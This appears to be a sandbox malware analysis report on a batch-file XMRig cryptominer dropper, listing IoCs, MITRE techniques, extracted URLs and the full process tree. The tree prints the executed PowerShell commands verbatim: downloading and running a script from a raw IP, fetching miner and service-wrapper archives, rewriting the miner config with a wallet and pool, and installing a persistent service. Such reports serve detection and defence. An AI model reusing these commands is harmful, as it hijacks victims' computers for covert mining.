xmrig | 9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5

Analysis

max time kernel
170s
max time network
216s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
03/07/2024, 20:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27386190991390.bat
Size

524B
MD5

92b307667679cc4bca93a2417be6137b
SHA1

5347620d753e52dbd274d04ae87356e09fe1c16d
SHA256

9646675a0d5cb5ccf4aa9408fc698bf5d020d27015c69c9c1ab0e2290137fdd5
SHA512

d99751550c337010791b8522ce1966384b41b2f17d6bfaf89034ce9ef25e2648e99ce5b345c6858c79b7af65b357036b42ed88447bca5854644d12ce9cf8a791

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001abd7-131.dat	family_xmrig
behavioral1/files/0x000700000001abd7-131.dat	xmrig
behavioral1/memory/4960-135-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-426-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-427-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-428-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-429-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-430-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-431-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-432-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-433-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-434-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-435-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-436-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-437-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-438-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/2064-439-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
1	668	powershell.exe
4	3760	powershell.exe
6	1060	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
4960	xmrig.exe
2412	nssm.exe
1636	nssm.exe
5076	nssm.exe
1628	nssm.exe
772	nssm.exe
3644	nssm.exe
656	nssm.exe
2064	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com
6	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1776	sc.exe
1228	sc.exe
1444	sc.exe
5108	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2408	powershell.exe
836	powershell.exe
3760	powershell.exe
1768	powershell.exe
1060	powershell.exe
2716	powershell.exe
668	powershell.exe
1376	powershell.exe
4404	powershell.exe
4376	powershell.exe
4992	powershell.exe
4924	powershell.exe
5028	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
3680	timeout.exe
2620	timeout.exe
1256	timeout.exe
4716	timeout.exe
3568	timeout.exe
4956	timeout.exe
4924	timeout.exe
520	timeout.exe
3032	timeout.exe
2264	timeout.exe
2148	timeout.exe
2408	timeout.exe
4548	timeout.exe
208	timeout.exe
1436	timeout.exe
360	timeout.exe
64	timeout.exe
4696	timeout.exe
4276	timeout.exe
2844	timeout.exe
3040	timeout.exe
2860	timeout.exe
4656	timeout.exe
4452	timeout.exe
3716	timeout.exe
5100	timeout.exe
3380	timeout.exe
4548	timeout.exe
3980	timeout.exe
2412	timeout.exe
4136	timeout.exe
4376	timeout.exe
3052	timeout.exe
3760	timeout.exe
4244	timeout.exe
2880	timeout.exe
4708	timeout.exe
4932	timeout.exe
1216	timeout.exe
1504	timeout.exe
4952	timeout.exe
3960	timeout.exe
3760	timeout.exe
1456	timeout.exe
668	timeout.exe
2652	timeout.exe
3116	timeout.exe
2200	timeout.exe
1292	timeout.exe
4912	timeout.exe
592	timeout.exe
2908	timeout.exe
3760	timeout.exe
3492	timeout.exe
4472	timeout.exe
1448	timeout.exe
4156	timeout.exe
1400	timeout.exe
2616	timeout.exe
4600	timeout.exe
4496	timeout.exe
3680	timeout.exe
2888	timeout.exe
212	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2064	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
668	powershell.exe
668	powershell.exe
668	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
4924	powershell.exe
4924	powershell.exe
4924	powershell.exe
836	powershell.exe
836	powershell.exe
836	powershell.exe
2408	powershell.exe
2408	powershell.exe
2408	powershell.exe
1376	powershell.exe
1376	powershell.exe
1376	powershell.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
4376	powershell.exe
4376	powershell.exe
4376	powershell.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeLockMemoryPrivilege	2064	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2276	WMIC.exe
Token: SeSecurityPrivilege	2276	WMIC.exe
Token: SeTakeOwnershipPrivilege	2276	WMIC.exe
Token: SeLoadDriverPrivilege	2276	WMIC.exe
Token: SeSystemProfilePrivilege	2276	WMIC.exe
Token: SeSystemtimePrivilege	2276	WMIC.exe
Token: SeProfSingleProcessPrivilege	2276	WMIC.exe
Token: SeIncBasePriorityPrivilege	2276	WMIC.exe
Token: SeCreatePagefilePrivilege	2276	WMIC.exe
Token: SeBackupPrivilege	2276	WMIC.exe
Token: SeRestorePrivilege	2276	WMIC.exe
Token: SeShutdownPrivilege	2276	WMIC.exe
Token: SeDebugPrivilege	2276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2276	WMIC.exe
Token: SeRemoteShutdownPrivilege	2276	WMIC.exe
Token: SeUndockPrivilege	2276	WMIC.exe
Token: SeManageVolumePrivilege	2276	WMIC.exe
Token: 33	2276	WMIC.exe
Token: 34	2276	WMIC.exe
Token: 35	2276	WMIC.exe
Token: 36	2276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2276	WMIC.exe
Token: SeSecurityPrivilege	2276	WMIC.exe
Token: SeTakeOwnershipPrivilege	2276	WMIC.exe
Token: SeLoadDriverPrivilege	2276	WMIC.exe
Token: SeSystemProfilePrivilege	2276	WMIC.exe
Token: SeSystemtimePrivilege	2276	WMIC.exe
Token: SeProfSingleProcessPrivilege	2276	WMIC.exe
Token: SeIncBasePriorityPrivilege	2276	WMIC.exe
Token: SeCreatePagefilePrivilege	2276	WMIC.exe
Token: SeBackupPrivilege	2276	WMIC.exe
Token: SeRestorePrivilege	2276	WMIC.exe
Token: SeShutdownPrivilege	2276	WMIC.exe
Token: SeDebugPrivilege	2276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2276	WMIC.exe
Token: SeRemoteShutdownPrivilege	2276	WMIC.exe
Token: SeUndockPrivilege	2276	WMIC.exe
Token: SeManageVolumePrivilege	2276	WMIC.exe
Token: 33	2276	WMIC.exe
Token: 34	2276	WMIC.exe
Token: 35	2276	WMIC.exe
Token: 36	2276	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1496	WMIC.exe
Token: SeSecurityPrivilege	1496	WMIC.exe
Token: SeTakeOwnershipPrivilege	1496	WMIC.exe
Token: SeLoadDriverPrivilege	1496	WMIC.exe
Token: SeSystemProfilePrivilege	1496	WMIC.exe
Token: SeSystemtimePrivilege	1496	WMIC.exe
Token: SeProfSingleProcessPrivilege	1496	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2064	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4748 wrote to memory of 668	4748	cmd.exe	75
PID 4748 wrote to memory of 668	4748	cmd.exe	75
PID 668 wrote to memory of 4912	668	powershell.exe	76
PID 668 wrote to memory of 4912	668	powershell.exe	76
PID 4912 wrote to memory of 1444	4912	cmd.exe	77
PID 4912 wrote to memory of 1444	4912	cmd.exe	77
PID 1444 wrote to memory of 3888	1444	net.exe	78
PID 1444 wrote to memory of 3888	1444	net.exe	78
PID 4912 wrote to memory of 1584	4912	cmd.exe	79
PID 4912 wrote to memory of 1584	4912	cmd.exe	79
PID 4912 wrote to memory of 3164	4912	cmd.exe	80
PID 4912 wrote to memory of 3164	4912	cmd.exe	80
PID 4912 wrote to memory of 1300	4912	cmd.exe	81
PID 4912 wrote to memory of 1300	4912	cmd.exe	81
PID 4912 wrote to memory of 3032	4912	cmd.exe	82
PID 4912 wrote to memory of 3032	4912	cmd.exe	82
PID 4912 wrote to memory of 3428	4912	cmd.exe	83
PID 4912 wrote to memory of 3428	4912	cmd.exe	83
PID 4912 wrote to memory of 1776	4912	cmd.exe	84
PID 4912 wrote to memory of 1776	4912	cmd.exe	84
PID 4912 wrote to memory of 1228	4912	cmd.exe	85
PID 4912 wrote to memory of 1228	4912	cmd.exe	85
PID 4912 wrote to memory of 2064	4912	cmd.exe	86
PID 4912 wrote to memory of 2064	4912	cmd.exe	86
PID 4912 wrote to memory of 3760	4912	cmd.exe	88
PID 4912 wrote to memory of 3760	4912	cmd.exe	88
PID 4912 wrote to memory of 5028	4912	cmd.exe	89
PID 4912 wrote to memory of 5028	4912	cmd.exe	89
PID 4912 wrote to memory of 4924	4912	cmd.exe	90
PID 4912 wrote to memory of 4924	4912	cmd.exe	90
PID 4912 wrote to memory of 4960	4912	cmd.exe	91
PID 4912 wrote to memory of 4960	4912	cmd.exe	91
PID 4912 wrote to memory of 2884	4912	cmd.exe	92
PID 4912 wrote to memory of 2884	4912	cmd.exe	92
PID 2884 wrote to memory of 836	2884	cmd.exe	93
PID 2884 wrote to memory of 836	2884	cmd.exe	93
PID 836 wrote to memory of 2756	836	powershell.exe	94
PID 836 wrote to memory of 2756	836	powershell.exe	94
PID 4912 wrote to memory of 2408	4912	cmd.exe	95
PID 4912 wrote to memory of 2408	4912	cmd.exe	95
PID 4912 wrote to memory of 1376	4912	cmd.exe	96
PID 4912 wrote to memory of 1376	4912	cmd.exe	96
PID 4912 wrote to memory of 1768	4912	cmd.exe	97
PID 4912 wrote to memory of 1768	4912	cmd.exe	97
PID 4912 wrote to memory of 4404	4912	cmd.exe	98
PID 4912 wrote to memory of 4404	4912	cmd.exe	98
PID 4912 wrote to memory of 4376	4912	cmd.exe	99
PID 4912 wrote to memory of 4376	4912	cmd.exe	99
PID 4912 wrote to memory of 4992	4912	cmd.exe	100
PID 4912 wrote to memory of 4992	4912	cmd.exe	100
PID 4912 wrote to memory of 1060	4912	cmd.exe	101
PID 4912 wrote to memory of 1060	4912	cmd.exe	101
PID 4912 wrote to memory of 2716	4912	cmd.exe	102
PID 4912 wrote to memory of 2716	4912	cmd.exe	102
PID 4912 wrote to memory of 1444	4912	cmd.exe	103
PID 4912 wrote to memory of 1444	4912	cmd.exe	103
PID 4912 wrote to memory of 5108	4912	cmd.exe	104
PID 4912 wrote to memory of 5108	4912	cmd.exe	104
PID 4912 wrote to memory of 2412	4912	cmd.exe	105
PID 4912 wrote to memory of 2412	4912	cmd.exe	105
PID 4912 wrote to memory of 1636	4912	cmd.exe	106
PID 4912 wrote to memory of 1636	4912	cmd.exe	106
PID 4912 wrote to memory of 5076	4912	cmd.exe	107
PID 4912 wrote to memory of 5076	4912	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\27386190991390.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7157.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1444
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:3888
  - - C:\Windows\system32\where.exe
      where powershell
      4⤵
      PID:1584
  - - C:\Windows\system32\where.exe
      where find
      4⤵
      PID:3164
  - - C:\Windows\system32\where.exe
      where findstr
      4⤵
      PID:1300
  - - C:\Windows\system32\where.exe
      where tasklist
      4⤵
      PID:3032
  - - C:\Windows\system32\where.exe
      where sc
      4⤵
      PID:3428
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1776
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /t /im xmrig.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4924
  - - C:\Users\Admin\moneroocean\xmrig.exe
      "C:\Users\Admin\moneroocean\xmrig.exe" --help
      4⤵
      Executes dropped EXE
      PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:836
      - C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        6⤵
        
        PID:2756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2408
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Kzowysni\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2716
  - - C:\Windows\system32\sc.exe
      sc stop moneroocean_miner
      4⤵
      Launches sc.exe
      PID:1444
  - - C:\Windows\system32\sc.exe
      sc delete moneroocean_miner
      4⤵
      Launches sc.exe
      PID:5108
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
      4⤵
      Executes dropped EXE
      PID:2412
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
      4⤵
      Executes dropped EXE
      PID:1636
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
      4⤵
      Executes dropped EXE
      PID:5076
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
      4⤵
      Executes dropped EXE
      PID:1628
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
      4⤵
      Executes dropped EXE
      PID:772
  - - C:\Users\Admin\moneroocean\nssm.exe
      "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
      4⤵
      Executes dropped EXE
      PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4952
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:516
